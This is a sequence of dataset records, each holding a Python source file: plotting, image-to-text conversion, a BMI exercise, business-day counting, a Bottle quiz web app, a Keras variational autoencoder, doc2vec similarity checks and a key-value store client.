os.makedirs('./incumbents', exist_ok=True)\n fig_name = './incumbents'+'/s%d-run%d-seed%d.png'%(\n args.space, args.run_id, args.seed\n )\n plt.savefig(fig_name)\n plt.show()\n #embed()\n\n#fanova_analysis()\ntrajectory_plot()\n#embed()\n","sub_path":"bohb_2nd/plots/analysis_RE.py","file_name":"analysis_RE.py","file_ext":"py","file_size_in_byte":9670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"451092993","text":"import os\nfrom PIL import Image\n\na = str(input(\"Images Dir -> \")) + \"\\\\\"\nb = a + \"pixelvalues\\\\\"\nx = int(input(\"num images (n(inclusive)) -> \"))\n\n\nif not os.path.exists(b):\n os.makedirs(b)\n\nfor i in range(0, x + 1):\n img = Image.open(a + str(i) + \".png\").convert('L')\n img.save(a + str(i) + \".png\")\n\nfor i in range(0, x + 1):\n im = Image.open(a + str(i) + '.png')\n height, width = im.size\n data = []\n\n for ecs in range(im.width):\n for why in range(im.height):\n data.append(str(im.getpixel((ecs, why))))\n\n #WRITING DATA TO TEXT FILE\n try:\n f = open(b + str(i) + 
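`trajectory_plot()` above scatters per-budget runs and overlays the regularized-evolution baseline; the incumbent (best-loss-so-far) curve that hpbandster's `get_incumbent_trajectory` provides can be reproduced from raw (time, loss) pairs with a running minimum. A standalone sketch with illustrative data:

```python
import numpy as np

times = np.array([10.0, 25.0, 40.0, 90.0])   # wallclock finish times [s]
losses = np.array([0.30, 0.22, 0.27, 0.15])  # e.g. validation regrets
order = np.argsort(times)
incumbent = np.minimum.accumulate(losses[order])
for t, best in zip(times[order], incumbent):
    print(t, best)  # step-wise best-so-far, ready for plt.step(..., where='post')
```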
\".txt\", 'x') #Create new file if a file does not exist\n f.close()\n except: #If file exists\n pass\n \n f = open(b + str(i) + \".txt\", 'w')\n f.write(\",\".join(data)) #Write data\n f.close() #Close 'f' for next loop","sub_path":"pixelvalue.py","file_name":"pixelvalue.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"252595424","text":"\"\"\"\nCalcular IMC - ler altura e peso\n\nabaixo de 18.5: Abaixo do peso\nEntre 18.5 e 25: Peso ideal\n25 até 30: Sobrepeso\n30 até 40: Obesidade\nacime de 40: Obesidade mórdida\n\"\"\"\npeso = float(input(\"Entre com o peso em KG: \"))\naltura = float(input(\"Entre com altura em metros: \"))\n\nIMC = peso/(altura*altura)\n\nif IMC < 18.5:\n print(\"Você esta \\033[7mabaixo do peso\\033[m, seu IMC e de {:.2f}\".format(IMC))\nelif IMC < 25:\n print(\"Você esta no peso ideal, seu IMC e de {:.2f}\".format(IMC))\nelif IMC < 30:\n print(\"Você esta no \\033[7mSobrepeso\\033[m, seu IMC e de {:.2f}\".format(IMC))\nelif IMC < 40:\n print(\"Você esta no \\033[7mObesidade\\033[m, seu IMC e de {:.2f}\".format(IMC))\nelse:\n print(\"Você esta no \\033[7mObesidade mórdida\\033[m, seu IMC e de {:.2f}\".format(IMC))","sub_path":"Arquivos Exercicios/Exercicios/Ex043.py","file_name":"Ex043.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"482705249","text":"'''\n\n- entrada dos dados: conta(data_inicio, data_fim, datas_feriados, dias_dos_fins_de_semana)\n\n- as datas_início/fim deverão estar no formato datetime\n\n- datas_feriados, também em datetime, serão determinados antes de chamar a função, puxados de 'feriados.csv'\n\n- dias_dos_fins_de_semana: os dias da semana no datetime são\n \n [MON, TUE, WED, THU, FRI, SAT, SUN]\n seus indexes serão\n 0 1 2 3 4 5 6\n \n ex: se os finais de semana forem o sábado e o domingo --> 5,6 (tupla mesmo)\n \n \n### acrescento a função que conta os dias corridos conforme a legislação tributária ###\n\nimagino que seja conforme art.210 do CTN\n\n Art. 210. Os prazos fixados nesta Lei ou legislação tributária serão contínuos, \n excluindo-se na sua contagem o dia de início e incluindo-se o de vencimento.\n\n Parágrafo único. 
Os prazos só se iniciam ou vencem em dia de expediente normal \n na repartição em que corra o processo ou deva ser praticado o ato.\n\nIsso para o IR acho que é importante, e aplico o mesmo pro resto das taxas nos Títulos.\nparece um detalhe, mas são 2,5 pontos percentuais da rentabilidade cada vez q muda\n\nentão é importante saber o dia certo que o cara vai ter um ganho por causa de prazo \n\na função pede duas coisas a mais:\n\n1 - D + ?\n2 - o primeiro dia tem que ser útil?\n\n\n'''\n\n \nimport datetime\nfrom datetime import datetime\nfrom datetime import timedelta\nimport csv\nimport sys\n\ninstruc = ('\\nPara calcular dias úteis:' + '\\n\\n'\n \t 'networkdays.py [inicio] [fim]' + '\\n\\n' +\n \t 'Para calcular dias corridos conforme legislação tributária:' + '\\n\\n'\n \t 'networkdays.py [inicio] [fim] -ct' + '\\n\\n' +\n \t 'as datas devem estar no formato dd/mm/aaaa\\n')\n \t \n\n\ndef corridos(start_date,\n end_date,\n holidays,\n weekends,\n dmaisqto = 0,\n prim_util = False):\n \n if prim_util is False:\n dmaisn = start_date + timedelta(dmaisqto)\n\n else:\n dmaisn = start_date + timedelta(dmaisqto)\n while (dmaisn in holidays) or (dmaisn.weekday() in weekends):\n dmaisn += timedelta(1)\n \n ct = (end_date - dmaisn).days + 1\n \n return ct\n\ndef conta(start_date,\n end_date,\n holidays,\n weekends):\n \n delta_days = (end_date - start_date).days + 1\n \n full_weeks, extra_days = divmod(delta_days, 7)\n \n # num_workdays = how many days/week you work * total of weeks\n \n num_workdays = (full_weeks + 1) * (7 - len(weekends))\n \n # subtract out any working days that fall in the 'shortened week'\n \n for d in range(1, 8 - extra_days):\n if (end_date + timedelta(d)).weekday() not in weekends:\n num_workdays -= 1\n \n # skip holidays that fall on weekends\n \n holidays = [x for x in holidays if x.weekday() not in weekends]\n \n # subtract out any holidays \n\n for d in holidays:\n if start_date <= d <= end_date:\n num_workdays -= 1\n \n return num_workdays\n \n \nif __name__ == \"__main__\":\n\n if len(sys.argv) in (3,4):\n \n # carregar os feriados do CSV\n feriados = []\n\n arquivo = open('feriados.csv')\n arquivolido = csv.reader(arquivo)\n\n for row in arquivolido:\n feriados.append(datetime.strptime(row[0],'%Y-%m-%d %H:%M:%S'))\n\n arquivo.close()\n\n # definir os fins de semana\n findi = 5,6\n\n # checa o formato das datas\n try:\n init = datetime.strptime(sys.argv[1], '%d/%m/%Y')\n try: \n fini = datetime.strptime(sys.argv[2], '%d/%m/%Y')\n \n # testa se a data final é maior que a inicial, se tudo ok chama a função\n if init > fini:\n raise SystemExit('data final menor que a inicial')\n else:\n if len(sys.argv) == 3:\n print(conta(init,fini,feriados, findi))\n elif sys.argv[3] == '-ct':\n print(corridos(init,fini,feriados, findi))\n else:\n \t sys.exit(instruc)\n except ValueError:\n raise SystemExit('a data final é inválida ou não está no formato pedido')\n except ValueError:\n raise SystemExit('a data inicial é inválida ou não está no formato pedido')\n \n else:\n \t sys.exit(instruc)\n","sub_path":"Tesouro/networkdays.py","file_name":"networkdays.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"640851390","text":"import bottle\nfrom bottle import run, default_app, debug, template, request, redirect, get, post, static_file, BaseTemplate, HTTPResponse, HTTPError, time\nimport sqlite3, oauth\nfrom beaker.middleware import SessionMiddleware\n\nsession_opts = {\n 
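# A quick gloss of these Beaker options (hedged summary per the Beaker\n    # docs, not from the original source): 'session.type' = 'file' keeps\n    # pickled sessions on disk under 'session.data_dir';\n    # 'session.cookie_expires' = 300 expires the session cookie after 300\n    # seconds; 'session.auto' = True saves the session automatically at\n    # the end of each request.\n    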
'session.type': 'file',\n    'session.cookie_expires': 300,\n    'session.data_dir': './data',\n    'session.auto': True\n}\n\n# NOTE: the '<...>' wildcard parts of the next two route rules were lost\n# when this file was scraped; the regex filters below are assumed\n# reconstructions (both handlers only serve files from ./static/).\n@get('/<filename:re:.*\\.css>')\ndef getfile(filename):\n    return static_file(filename, root='./static/')\n\n@get('/<filename:re:.*\\.js>')\ndef getOtherFile(filename):\n    return static_file(filename, root='./static/')\n\n@get('/')\ndef main():\n    output = template('main.tpl')\n    return output\n\n@get('/main')\ndef redirectmain():\n    return redirect('/')\n\n@get('/gamelore')\ndef gamelore():\n    output = template('gamelore.tpl')\n    return output\n\n@get('/gamerule')\ndef gamerule():\n    output = template('gamerule.tpl')\n    return output\n\n\n#Select different level questions: 'EntryLevel', 'MidLevel', 'HighLevel'\ndef selectLevelQuestion(level):\n    conn = sqlite3.connect('./Database/princess.db')\n    c = conn.cursor()\n    c.execute(\"select count(distinct(Question)) from Questions where GameLevel=?\" , (level,))\n    result = c.fetchall()\n    global total\n    for row in result:\n        total = int(row[0])\n    print(total)\n\n    curr_time = int(round(time.time()))\n    rand_value = curr_time % total + 1\n    print(rand_value)\n    #c.execute(\"update Questions SET Question = 'Who is credited with inventing the first mass produced helicopter?' where QuestionID=4\")\n    #conn.commit()\n    c.execute(\"select QuestionID from Questions where GameLevel=?\", (level,))\n    result = c.fetchall()\n    c.close()\n    index=1\n    global qid\n    for row in result:\n        if(index == rand_value):\n            qid = int(row[0])\n        index = index + 1\n    return qid\n\n@get('/gamepage')\ndef gamepage(qid=1):\n    session = bottle.request.environ.get('beaker.session')\n    game_user = session.get('game_user')\n    if game_user is None:\n        return redirect(\"/\")\n    qid = selectLevelQuestion('EntryLevel')\n    conn = sqlite3.connect('./Database/princess.db')\n    c = conn.cursor()\n\n    c.execute(\"select Q.Question,group_concat(O.Options_value) as Options_value from Questions Q , Options O where Q.QuestionID=O.QuestionID and Q.QuestionID=? 
GROUP BY Q.Question\",(qid,))\n\n result = c.fetchall()\n c.close()\n global option\n for row in result:\n option = row[1].split(',')\n\n output = template('gamepage.tpl', questions=result, options=option)\n return output\n\n@get('/contactus')\ndef contactus():\n output = template('contactus.tpl')\n return output\n\n@get('/signin')\ndef contactus():\n output = template('signin.tpl')\n return output\n\n@post('/googlesignin')\ndef google():\n if oauth.validateGoogle():\n return HTTPResponse(body='', status=200, headers=None)\n else:\n return HTTPError(status=500, body=None, exception=None, traceback=None)\n\n@post('/facebooksignin')\ndef facebook():\n if oauth.validateFacebook():\n return HTTPResponse(status=200)\n else:\n return HTTPError(status=500)\n\nif __name__ == \"__main__\":\n app = SessionMiddleware(bottle.app(), session_opts)\n debug(True)\n bottle.run(app=app, host='localhost',port=8080, reloader=True)\nelse:\n application = SessionMiddleware(default_app(), session_opts)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"431919228","text":"import os\nimport random\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nimport settings\nfrom databases import OmniglotDatabase\n\nimport matplotlib.pyplot as plt\n\n\nclass CheckPointFreq(tf.keras.callbacks.ModelCheckpoint):\n def __init__(self, epochs, freq=1, *args, **kwargs):\n super(CheckPointFreq, self).__init__(*args, **kwargs)\n self.freq = freq\n self.epochs = epochs\n\n def on_epoch_end(self, epoch, logs=None):\n if epoch != 0 and (epoch + 1) % self.freq == 0:\n super(CheckPointFreq, self).on_epoch_end(epoch, logs)\n\n def on_train_end(self, logs=None):\n self.epochs_since_last_save = np.inf\n self._save_model(self.epochs, logs)\n\n super(CheckPointFreq, self).on_train_end(logs)\n\n\nclass VisualizationCallback(tf.keras.callbacks.TensorBoard):\n def __init__(self, visualization_freq=1, *args, **kwargs):\n super(VisualizationCallback, self).__init__(*args, **kwargs)\n self.visualization_freq = visualization_freq\n\n def on_epoch_end(self, epoch, logs=None):\n super(VisualizationCallback, self).on_epoch_end(epoch, logs)\n if epoch != 0 and epoch % self.visualization_freq == 0:\n vae = self.model\n for item in vae.get_train_dataset().take(1):\n z_mean, z_log_var, z = vae.encode(item)\n new_item = vae.decode(z)\n\n writer = self._get_writer(self._train_run_name)\n with writer.as_default():\n tf.summary.image(name='x', data=item, step=epoch, max_outputs=5)\n tf.summary.image(name='x^', data=new_item, step=epoch, max_outputs=5)\n\n\nclass AudioCallback(tf.keras.callbacks.TensorBoard):\n def __init__(self, visualization_freq=1, *args, **kwargs):\n super(AudioCallback, self).__init__(*args, **kwargs)\n self.visualization_freq = visualization_freq\n\n def on_epoch_end(self, epoch, logs=None):\n super(AudioCallback, self).on_epoch_end(epoch, logs)\n if epoch != 0 and epoch % self.visualization_freq == 0:\n vae = self.model\n for item in vae.get_train_dataset().take(1):\n z_mean, z_log_var, z = vae.encode(item)\n new_item = vae.decode(z)\n\n writer = self._get_writer(self._train_run_name)\n with writer.as_default():\n tf.summary.audio(name='x', data=item, sample_rate=16000, step=epoch, max_outputs=5)\n tf.summary.audio(name='x^', data=new_item, step=epoch, sample_rate=16000, max_outputs=5)\n\n\nclass Sampling(layers.Layer):\n \"\"\"Uses 
(z_mean, z_log_var) to sample z, the vector encoding a digit.\"\"\"\n def call(self, inputs):\n z_mean, z_log_var = inputs\n batch = tf.shape(z_mean)[0]\n dim = tf.shape(z_mean)[1]\n epsilon = tf.keras.backend.random_normal(shape=(batch, dim))\n return z_mean + tf.exp(0.5 * z_log_var) * epsilon\n\n\nclass VAE(keras.Model):\n def __init__(\n self,\n vae_name,\n image_shape,\n latent_dim,\n database,\n parser,\n encoder,\n decoder,\n visualization_freq,\n learning_rate,\n **kwargs\n ):\n super(VAE, self).__init__(**kwargs)\n self.latent_dim = latent_dim\n self.database = database\n self.parser = parser\n self.visualization_freq = visualization_freq\n self.image_shape = image_shape\n self.optimizer = keras.optimizers.Adam(learning_rate=learning_rate)\n self.sampler = Sampling()\n self.vae_name = vae_name\n self.encoder = encoder\n self.decoder = decoder\n\n self.loss_metric = tf.keras.metrics.Mean()\n self.reconstruction_loss_metric = tf.keras.metrics.Mean()\n self.kl_loss_metric = tf.keras.metrics.Mean()\n\n def get_vae_name(self):\n return self.vae_name\n\n def sample(self, z_mean, z_log_var):\n return self.sampler((z_mean, z_log_var))\n\n def encode(self, item):\n z_mean, z_log_var = self.encoder(item)\n z = self.sample(z_mean, z_log_var)\n return z_mean, z_log_var, z\n\n def decode(self, item):\n return self.decoder(item)\n\n def call(self, inputs, training=None, mask=None):\n z_mean, z_log_var = self.encoder(inputs)\n z = self.sampler([z_mean, z_log_var])\n reconstruction = self.decoder(z)\n reconstruction_loss = tf.reduce_mean(\n keras.losses.binary_crossentropy(inputs, reconstruction)\n )\n reconstruction_loss *= np.prod(self.image_shape)\n kl_loss = 1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var)\n kl_loss = tf.reduce_mean(kl_loss)\n kl_loss *= -0.5\n total_loss = reconstruction_loss + kl_loss\n\n return {\n \"loss\": total_loss,\n \"reconstruction_loss\": reconstruction_loss,\n \"kl_loss\": kl_loss,\n }\n\n def test_step(self, data):\n outputs = self.call(data)\n self.loss_metric.update_state(outputs['loss'])\n self.reconstruction_loss_metric.update_state(outputs['reconstruction_loss'])\n self.kl_loss_metric.update_state(outputs['kl_loss'])\n\n return {\n \"loss\": self.loss_metric.result(),\n \"reconstruction_loss\": self.reconstruction_loss_metric.result(),\n \"kl_loss\": self.kl_loss_metric.result()\n }\n\n def train_step(self, data):\n with tf.GradientTape() as tape:\n outputs = self.call(data)\n\n grads = tape.gradient(outputs['loss'], self.trainable_weights)\n self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\n\n self.loss_metric.update_state(outputs['loss'])\n self.reconstruction_loss_metric.update_state(outputs['reconstruction_loss'])\n self.kl_loss_metric.update_state(outputs['kl_loss'])\n\n return {\n \"loss\": self.loss_metric.result(),\n \"reconstruction_loss\": self.reconstruction_loss_metric.result(),\n \"kl_loss\": self.kl_loss_metric.result()\n }\n\n def get_dataset(self, partition='train'):\n instances = self.database.get_all_instances(partition_name=partition)\n random.shuffle(instances)\n train_dataset = tf.data.Dataset.from_tensor_slices(instances).shuffle(len(instances))\n train_dataset = train_dataset.map(self.parser.get_parse_fn())\n train_dataset = train_dataset.batch(128)\n return train_dataset\n\n def get_train_dataset(self):\n return self.get_dataset(partition='train')\n\n def get_val_dataset(self):\n return self.get_dataset(partition='val')\n\n def load_latest_checkpoint(self, epoch_to_load_from=None):\n latest_checkpoint = 
tf.train.latest_checkpoint(\n os.path.join(\n settings.PROJECT_ROOT_ADDRESS,\n 'models',\n 'lasiummamlvae',\n 'vae',\n self.get_vae_name(),\n 'vae_checkpoints'\n )\n )\n\n if latest_checkpoint is not None:\n self.load_weights(latest_checkpoint)\n epoch = int(latest_checkpoint[latest_checkpoint.rfind('_') + 1:])\n return epoch\n\n return -1\n\n def perform_training(self, epochs, checkpoint_freq=100, vis_callback_cls=None):\n initial_epoch = self.load_latest_checkpoint()\n if initial_epoch != -1:\n print(f'Continue training from epoch {initial_epoch}.')\n\n train_dataset = self.get_train_dataset()\n val_dataset = self.get_val_dataset()\n\n checkpoint_callback = CheckPointFreq(\n freq=checkpoint_freq,\n filepath=os.path.join(\n settings.PROJECT_ROOT_ADDRESS,\n 'models',\n 'lasiummamlvae',\n 'vae',\n self.get_vae_name(),\n 'vae_checkpoints',\n 'vae_{epoch:02d}'\n ),\n save_freq='epoch',\n save_weights_only=True,\n epochs=epochs - 1\n )\n if vis_callback_cls is None:\n vis_callback_cls = VisualizationCallback\n\n tensorboard_callback = vis_callback_cls(\n log_dir=os.path.join(\n settings.PROJECT_ROOT_ADDRESS,\n 'models',\n 'lasiummamlvae',\n 'vae',\n self.get_vae_name(),\n 'vae_logs'\n ),\n visualization_freq=self.visualization_freq\n )\n\n callbacks = [tensorboard_callback, checkpoint_callback]\n\n self.compile(optimizer=self.optimizer)\n self.fit(\n train_dataset,\n epochs=epochs,\n callbacks=callbacks,\n validation_data=val_dataset,\n initial_epoch=initial_epoch\n )\n\n def visualize_meta_learning_task2(self):\n tf.random.set_seed(10)\n for item in self.get_train_dataset().take(1):\n z_mean, z_log_var, z = self.encode(item)\n fig, axes = plt.subplots(1, 6)\n fig.set_figwidth(6)\n fig.set_figheight(1)\n\n axes[0].imshow(item[0, ..., 0], cmap='gray')\n for i in range(1, 6):\n axes[i].imshow(self.decode(z + tf.random.normal(shape=z.shape, stddev=0.2 * i))[0, ..., 0], cmap='gray')\n axes[i].set_xlabel(f'noise stddev: {0.2 * i:0.2f}', size='xx-small')\n\n plt.show()\n\n def visualize_meta_learning_task(self):\n tf.random.set_seed(10)\n for item in self.get_train_dataset().take(1):\n z_mean, z_log_var, z = self.encode(item)\n new_item = self.decode(z)\n\n std = tf.exp(0.5 * z_log_var)\n std = 1 / tf.nn.softmax(std) * std\n\n new_zs = list()\n length = 15\n for i in range(length):\n new_z = z_mean + i / 5 * std\n new_z = new_z[0, ...][tf.newaxis, ...]\n new_zs.append(new_z)\n\n for i in range(length):\n new_z = z_mean - i / 5 * std\n new_z = new_z[0, ...][tf.newaxis, ...]\n new_zs.append(new_z)\n\n fig, axes = plt.subplots(length + 1, 2)\n fig.set_figwidth(2)\n fig.set_figheight(length + 1)\n\n axes[0, 0].imshow(item[0, ..., 0], cmap='gray')\n axes[0, 0].set_xlabel('Real image', size='xx-small')\n axes[0, 1].imshow(new_item[0, ..., 0], cmap='gray')\n axes[0, 1].set_xlabel('Reconstruction', size='xx-small')\n for i in range(1, length + 1):\n new_item = self.decode(new_zs[i - 1][tf.newaxis, ...])\n axes[i, 0].imshow(new_item[0, ..., 0], cmap='gray')\n axes[i, 0].set_xlabel(f'mean + {i / 5} * std', size='xx-small')\n\n new_item = self.decode(new_zs[length + i - 1][tf.newaxis, ...])\n axes[i, 1].imshow(new_item[0, ..., 0], cmap='gray')\n axes[i, 1].set_xlabel(f'mean - {i / 5} * std', size='xx-small')\n\n plt.show()\n\n tf.random.set_seed(None)\n","sub_path":"models/lasiummamlvae/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":11036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"124667335","text":"import numpy as np\nimport 
random\nimport math\n\ndef culoareMedie(img):\n mCol = []\n for i in range(img.shape[2]):\n mCol.append(img[:, :, i].mean())\n\n return mCol\n\ndef euclDist(v1, v2):\n sum = 0\n for i in range(len(v1)):\n sum += ((v1[i] - v2[i]) * (v1[i] - v2[i]))\n\n return sum\n\ndef getPosCuloareMedieMin(vImg, vPiese):\n minDist = euclDist(vImg, vPiese[0])\n minPos = 0\n eps = 1e-5\n\n for i in range(1, len(vPiese)):\n dist = euclDist(vImg, vPiese[i])\n if dist - minDist < eps:\n minDist = dist\n minPos = i\n\n return minPos\n\ndef getCuloareMedieMin(vImg, vPiese):\n dists = []\n pos = []\n for i in range(0, len(vPiese)):\n dist = euclDist(vImg, vPiese[i])\n dists.append(dist)\n pos.append(i)\n\n minPos = [x for _, x in sorted(zip(dists, pos), key=lambda pair: pair[0])]\n return minPos\n\ndef adaugaPieseMozaicPeCaroiaj(params):\n imgMozaic = np.zeros(params.imgReferintaRedimensionata.shape, dtype=np.uint8)\n (N, H, W, C) = params.pieseMozaic.shape\n (h, w, c) = params.imgReferintaRedimensionata.shape\n\n if params.criteriu == 'aleator':\n nrTotalPiese = params.numarPieseMozaicVerticala \\\n * params.numarPieseMozaicOrizontala\n nrPiesteAdaugate = 0\n for i in range(params.numarPieseMozaicVerticala):\n for j in range(params.numarPieseMozaicOrizontala):\n # alege un indice aleator din cele N\n indice = random.randint(0, N - 1)\n up = i * H\n down = (i + 1) * H\n left = j * W\n right = (j + 1) * W\n\n imgMozaic[up:down, left:right, :] = params.pieseMozaic[indice, :, :, :]\n nrPiesteAdaugate += 1\n\n print('Construim mozaic ... %.2f%%' % (100 \\\n * nrPiesteAdaugate \\\n / nrTotalPiese))\n elif params.criteriu == 'distantaCuloareMedie':\n culoareMediePieseMozaic = []\n for i in range(params.pieseMozaic.shape[0]):\n culoareMediePieseMozaic.append(culoareMedie(params.pieseMozaic[i, :, :, :]))\n\n nrTotalPiese = params.numarPieseMozaicVerticala \\\n * params.numarPieseMozaicOrizontala\n nrPiesteAdaugate = 0\n for i in range(params.numarPieseMozaicVerticala):\n for j in range(params.numarPieseMozaicOrizontala):\n up = i * H\n down = (i + 1) * H\n left = j * W\n right = (j + 1) * W\n\n vImg = culoareMedie(params.imgReferintaRedimensionata[up:down,\n left:right])\n indice = getPosCuloareMedieMin(vImg, culoareMediePieseMozaic)\n\n imgMozaic[up:down, left:right, :] = params.pieseMozaic[indice, :, :, :]\n nrPiesteAdaugate += 1\n\n print('Construim mozaic ... 
%.2f%%' % (100 \\\n * nrPiesteAdaugate \\\n / nrTotalPiese))\n elif params.criteriu == 'distantaCuloareMedieDiferit':\n pieseMozaicUsed = [[-1 for j in range(params.numarPieseMozaicOrizontala)] for i in range(params.numarPieseMozaicVerticala)]\n dx = [-1, 0, 0, 1]\n dy = [0, -1, 1, 0]\n\n culoareMediePieseMozaic = []\n for i in range(params.pieseMozaic.shape[0]):\n culoareMediePieseMozaic.append(culoareMedie(params.pieseMozaic[i, :, :, :]))\n\n nrTotalPiese = params.numarPieseMozaicVerticala \\\n * params.numarPieseMozaicOrizontala\n nrPiesteAdaugate = 0\n for i in range(params.numarPieseMozaicVerticala):\n for j in range(params.numarPieseMozaicOrizontala):\n up = i * H\n down = (i + 1) * H\n left = j * W\n right = (j + 1) * W\n\n vImg = culoareMedie(params.imgReferintaRedimensionata[up:down,\n left:right])\n\n used_ind = []\n for d in range(4):\n newI = i + dx[d]\n newJ = j + dy[d]\n\n if newI < 0 or newI >= params.numarPieseMozaicVerticala or newJ < 0 or newJ >= params.numarPieseMozaicOrizontala:\n continue\n\n used_ind.append(pieseMozaicUsed[newI][newJ])\n\n inds = getCuloareMedieMin(vImg, culoareMediePieseMozaic)\n for ind in inds:\n if ind not in used_ind:\n indice = ind\n pieseMozaicUsed[i][j] = indice\n break\n\n imgMozaic[up:down, left:right, :] = params.pieseMozaic[indice, :, :, :]\n nrPiesteAdaugate += 1\n\n print('Construim mozaic ... %.2f%%' % (100 \\\n * nrPiesteAdaugate \\\n / nrTotalPiese))\n else:\n raise Exception(\"Optiune necunoscuta!\")\n\n return imgMozaic\n","sub_path":"An III Sem I/cava/Laboratoare/Proiect1_Python/src/adaugaPieseMozaicPeCaroiaj.py","file_name":"adaugaPieseMozaicPeCaroiaj.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"138848024","text":"\n# coding: utf-8\n\n# In[21]:\n\nimport gensim\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nimport os\nimport pickle\n\n\n# In[22]:\n\ncwd = os.getcwd()\nfolders_path = os.path.join(cwd, r\"20_newsgroups\")\n\n\n# In[60]:\n\nmodel = Doc2Vec.load('doc2vec.model')\n\n\n# In[24]:\n\nf = open(os.path.join(cwd, r'all_data.pkl'), 'rb')\nall_data = pickle.load(f)\nf.close()\n\nf = open(os.path.join(cwd, r'docLabels.pkl'), 'rb')\ndocLabels = pickle.load(f)\nf.close()\n\n\n# In[61]:\n\nprint(\"\"\"comp.graphics's Doc1's similarity with one document each from other folders: \"\"\")\n\ndoc1 = os.path.join(cwd, r'20_newsgroups\\comp.graphics\\37261')\ndoc1tag = all_data[docLabels.index(doc1)]\n\ncount = 0\navg_sim = 0\nfor root, _, files in os.walk(folders_path):\n for file in files:\n doc2 = os.path.join(root, file)\n if 'comp.graphics' in doc2.split('\\\\')[-2:]: #Not comparing with itself\n break\n doc2tag = all_data[docLabels.index(doc2)]\n count += 1\n \n sim = model.n_similarity(doc1tag, doc2tag)\n avg_sim += sim\n \n print(\"Similarity of \" + str(doc1.split('\\\\')[-2:]) + \" and \" + str(doc2.split('\\\\')[-2:]) + \": \" + str(sim))\n break\n\nprint(avg_sim/count)\n\n\n# In[62]:\n\nprint(\"\"\"comp.graphics's Doc1's similarity with 19 other documents: \"\"\")\n\ngraphics_folder_path = os.path.join(cwd, r'20_newsgroups\\comp.graphics')\ndoc1 = os.path.join(cwd, r'20_newsgroups\\comp.graphics\\37261')\ndoc1tag = all_data[docLabels.index(doc1)]\n\ncount = 0\navg_sim = 0\nfor root, _, files in os.walk(graphics_folder_path):\n for file in files:\n doc2 = os.path.join(root, file)\n if '37261' in doc2.split('\\\\')[-2:]: #Not comparing with itself\n continue\n doc2tag = all_data[docLabels.index(doc2)]\n count += 
1\n \n if (count == 20):\n break\n sim = model.n_similarity(doc1tag, doc2tag)\n avg_sim += sim\n \n print(\"Similarity of \" + str(doc1.split('\\\\')[-1:]) + \" and \" + str(doc2.split('\\\\')[-1:]) + \": \" + str(sim))\n\nprint(avg_sim/(count-1))\n\n","sub_path":"Assignment6/q2_find_sim.py","file_name":"q2_find_sim.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"581635472","text":"#coding=utf-8\n\nimport struct\nimport greenlet\n\nclass GmdbError(Exception):\n pass\n\nMAGIC = 0xc8\n\n# >0 包完整,并返回包的实际长度\n# =0 包不完整,需要后续的数据\n# <0 出错,包不合法\ndef check_get_pkg_len(data):\n fail_code = ord(data[0:1])\n if fail_code:\n return 1 #包长度为1\n datalen = len(data)\n if datalen < 5:\n return 0 #继续收包\n vallen = struct.unpack('>I', data[1:5])[0]\n if datalen < vallen + 5:\n return 0 #继续收包\n return vallen + 5 #完整的包长度\n\ndef check_put_pkg_len(data):\n return 1\n\ndef check_get_list_pkg_len(data):\n fail_code = ord(data[0:1])\n if fail_code:\n return 1\n datalen = len(data)\n if datalen < 5:\n return 0\n rnum = struct.unpack('>I', data[1:5])[0]\n if rnum == 0:\n return 5\n elif datalen < 13:\n return 0\n index = 5\n for i in xrange(0, rnum):\n keylen, vallen = struct.unpack('>II', data[index:index+8])\n if datalen < (index+8+keylen+vallen):\n return 0\n else:\n index += (8+keylen+vallen)\n return index\n\ndef check_add_int_pkg_len(data):\n datalen = len(data)\n if datalen < 5:\n return 0\n return 5\n\nclass gmdb_api():\n def __init__(self, ip, port):\n self.module = 'IP_%s_%d'%(ip, port)\n\n def get(self, key):\n if isinstance(key, int) or isinstance(key, long):\n key = struct.pack('=Q', key)\n data = struct.pack('>BBI', MAGIC, 0x30, len(key)) + key\n req_dict = {'module':self.module,'data':data,'check_len':check_get_pkg_len}\n ret_dict = greenlet.getcurrent().parent.switch(req_dict)\n ret_data = ret_dict['data']\n fail_code = ord(ret_data[0:1])\n if 7 == fail_code:\n return None\n elif 0 != fail_code:\n raise GmdbError(fail_code)\n return ret_data[5:]\n\n def set(self, key, val):\n if isinstance(key, int) or isinstance(key, long):\n key = struct.pack('=Q', key)\n data = struct.pack('>BBII', MAGIC, 0x10, len(key), len(val)) + key + val\n req_dict = {'module':self.module,'data':data,'check_len':check_put_pkg_len}\n ret_dict = greenlet.getcurrent().parent.switch(req_dict)\n ret_data = ret_dict['data']\n fail_code = ord(ret_data[0:1])\n if fail_code:\n raise GmdbError(fail_code)\n \n def delete(self, key):\n if isinstance(key, int) or isinstance(key, long):\n key = struct.pack('=Q', key)\n data = struct.pack('>BBI', MAGIC, 0x20, len(key)) + key\n req_dict = {'module':self.module,'data':data,'check_len':check_put_pkg_len}\n ret_dict = greenlet.getcurrent().parent.switch(req_dict)\n ret_data = ret_dict['data']\n fail_code = ord(ret_data[0:1])\n if fail_code:\n raise GmdbError(fail_code)\n\n def get_list(self, keys):\n data = struct.pack('>BBI', MAGIC, 0x31, len(keys))\n for key in keys:\n if isinstance(key, int) or isinstance(key, long):\n key = struct.pack('=Q', key)\n data += struct.pack('>I', len(key)) + key\n req_dict 